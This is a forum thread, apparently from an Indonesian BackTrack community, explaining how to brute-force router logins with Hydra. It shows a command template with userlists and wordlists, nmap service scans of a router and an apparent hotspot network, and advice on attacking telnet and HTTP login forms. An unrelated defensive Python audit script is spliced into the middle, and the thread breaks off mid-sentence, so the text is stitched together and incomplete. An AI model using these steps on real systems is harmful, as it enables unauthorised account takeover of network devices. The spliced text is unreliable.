+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+--- Thread: Hydra how to- (/thread-994.html)
hydra -L "userlist" -P "wordlist" ip-target service PLAIN
Meaning: -L is used if we have a list of users that might be in use (you can also do without -L, but then you have to name the user, and it must be a lowercase l, for example --> -l admin)
-P is the wordlist we have; on BT5 the default one is at /pentest/passwords/wordlists/darkc0de.lst
ip-target is filled in with our target; it can be a web server, router, switch, anything at all as long as it has an IP and a running service (and is among the services hydra supports, of course)
service is one of those listed in hydra's help (better to run nmap -sV first)
PLAIN if the target does not use HTTPS (if it does, use -S to make an SSL connection)
For example...
First we do a port scan with nmap:
Code:
root@iKONs:~# nmap -sV 192.168.1.1
Quote:
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-24 01:11 WIT
Nmap scan report for 192.168.1.1
Host is up (0.00078s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Netgear broadband router or ZyXel VoIP adapter ftpd 1.0
23/tcp open telnet Netgear broadband router or ZyXel VoIP adapter telnetd
80/tcp open http Allegro RomPager 4.07 UPnP/1.0 (ZyXEL ZyWALL 2)
MAC Address: D8:5D:4C:A1:9D:E7 (Tp-link Technologies Co.)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.30 seconds
From the data above we can see that port 23, a.k.a. the telnet service, is active...
Then let's run hydra, assuming the username is admin and the service to brute-force is telnet:
(10-24-2011, 05:34 PM)konspirasi Wrote: Well, you look at -sV in nmap, bro, then we see whether there is a service that can be exploited with hydra or not?
Already tried it, here's the report:
Code:
# nmap -sV 10.100.0.1
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-23 23:29 WIT
Nmap scan report for hotspot.zone.net (10.100.0.1)
Host is up (0.094s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Mikrotik RouterOS named or OpenDNS Updater
80/tcp open http?
443/tcp open https?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:15:6D:67:76:22 (Ubiquiti Networks)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.71 seconds
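Seen from the defender's side, the `nmap -sV` reports posted in this thread are an inventory of login services exposed in cleartext. The following is an added example, not part of the thread: a small Python audit that reads output in that format and lists open telnet, FTP and plain-HTTP services with a hardening step for each. The sample scan and the `audit` function name are constructed for illustration.

```python
import re

# Constructed sample in the format of `nmap -sV` normal output (not a real scan).
SAMPLE = """\
Nmap scan report for 192.0.2.1
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     example ftpd 1.0
23/tcp  open  telnet  example telnetd
80/tcp  open  http?
443/tcp open  https?
Nmap scan report for 192.0.2.2
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 8.9
23/tcp  closed telnet
"""

# Services that carry logins in cleartext, with the hardening step for each.
CLEARTEXT = {
    "telnet": "disable telnet; manage the device over SSH",
    "ftp": "disable FTP or replace it with SFTP/FTPS",
    "http": "serve the admin page over HTTPS only, from a management network",
}
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def audit(nmap_text):
    """Return (host, port, service, advice) for each open cleartext login service."""
    findings, host = [], None
    for line in nmap_text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if not m or host is None:
            continue
        port, _proto, state, service = m.groups()
        if state != "open":          # closed/filtered ports are not reachable
            continue
        name = service.rstrip("?")   # nmap appends "?" when it is guessing
        if name in CLEARTEXT:
            note = CLEARTEXT[name]
            if service.endswith("?"):
                note = "unconfirmed service, verify manually; " + note
            findings.append((host, int(port), name, note))
    return findings

if __name__ == "__main__":
    for host, port, name, note in audit(SAMPLE):
        print(f"{host}:{port} {name}: {note}")
```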
Ports 80 and 443 can work, but only if a web application is running there; just try opening it in a browser, bro, http://10.100.0.1 then https://10.100.0.1, is there a login page or not?
If there isn't one, it probably really can't be accessed from IPs outside its internal IP range, so it can't be exploited with hydra
Among the services there are http[s]-{head|get} and http[s]-{get|post}-form; there's a username and password form there, right? That means it uses the post method; since it's only http we use the one: